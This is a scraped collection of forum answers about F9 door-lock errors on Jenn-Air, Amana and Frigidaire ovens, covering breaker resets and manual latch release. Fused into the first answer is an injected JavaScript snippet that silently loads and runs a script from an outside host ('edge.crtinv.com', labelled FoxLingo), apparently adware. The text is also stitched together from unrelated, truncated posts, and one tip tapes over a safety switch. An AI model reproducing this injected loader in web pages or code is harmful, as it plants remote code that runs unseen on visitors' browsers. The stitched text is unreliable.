The latch has most likely become dislocated from its mounting points and will need to be secured back in place correctly.. Check the mounting screws to see if they are loose. Then move the latch back into position and tighten them securely. If not then the error will just come back. The latch mechanism may also need replacing altogether itf it is damaged.!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState '' this.readyState=="loaded" '' this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

SOURCE: Oven door locked, F9 indicator signal

Monster, F9 is the door locked error. Try turning off the breaker for 30 seconds and see if it resets. If not, you are going to have to get a coat hanger, make a U at one end and slip it between the door and latch from the left. Once you feel the latch, give it a tug and the door should open. Try resetting the board again with the door open and see if the lock mechanism homes. If not you will have to check the cam and switches for problems. Catriver..post back.

I had the same problem. Try this - it worked for me....turn off circuit breaker, unplug range..wait 1 minute...then turn on circuit breaker, plug in range, then pull door up and out (might feel like you're forcing it)...should work. Once you've overcome your fear of your food rotting in a locked oven, go buy a Viking or a Wolf...that's what I am doing.

Jennair oven 8114 p472-60 or p458-60 f9 error code

The F9 error code for this model number Jenn-air range indicates a door lock issue. The control sees it as locked, unlocked, or both at the same time.

The technical manual instructs us to check the wiring to and from the door lock mechanism and if no issues are found replace the motorized door lock.

Got F9 on Amana range model ACS3350 while trying to clean oven. The door is locked and got constant beeping with F9 error code. Powered off oven for 10 minutes and powered on, still getting the door...

Shut off the circuit breaker to it for FIVE minutes, then back on. If the problem persists then do the following:

A latch locks the center top INSIDE of the door during cleaning.
Run a piece of semi-stiff, flat object, like a cardboard strip that is in L shape behind the top lip of the door from RIGHT TO LEFT. You may need to push it along with your finger jambed in there when it reaches the latch. With a little push the latch should open.

Try to run the oven, if F9 shows again, press cancel Oven to quiet it. The Lock state is still in place. Move the latch hook manually all the way to RIGHT. Then shut off the circuit breaker for FIVE minutes, then back on. The oven should work ok.

If this fails again try the five minute shut off with the latch in other starting positions.

If none of these work then the latch mechanism, or it's motor is really broken. Replace or ditch and never buy Amana again!

Self clean oven door wouldn't unlock!

Hi,
Try a trick that was given by an expert :-
All I needed to do was unscrew the 2 screws holding the lock assembly and it released it!! I screwed it back in and set the oven to self clean and it worked!!
Unless , F9 refers to slave micro not working. A condition in which you might need to replace control board.
Thanks.

My Electric Frigidaire Convection Oven just locked it's own door! I heard a continual beep..then "Err" "F9" flashed, then beeping stopped and the illuminated "padlock" symbol lit up and the door locked...

I have a similar problem with my electric Frigidaire convection oven, which flashes ERR F9 and beeps after finishing a cleaning cycle; if you haven't had to have it repaired professionally by now you might try cutting the circuit breaker to the oven for a few seconds and then turning it back on. My oven takes a few minutes to reset, after the circuit is turned back on, but then will unlock the door and let me reset the clock and continue cooking as normal. . . until the next time I set the clean cycle.

Frigidaire Range FEF357BBD error code F9

I had the situation where the oven thinks the door is locked but it was not locked. Setting and holding clear eventually gave a f9 error.
I solved this by turning the circuit breaker off and taping over the oven light switch ( so it thinks it really is locked ) and turning on the breaker. The oven unlocked and appears fine now.
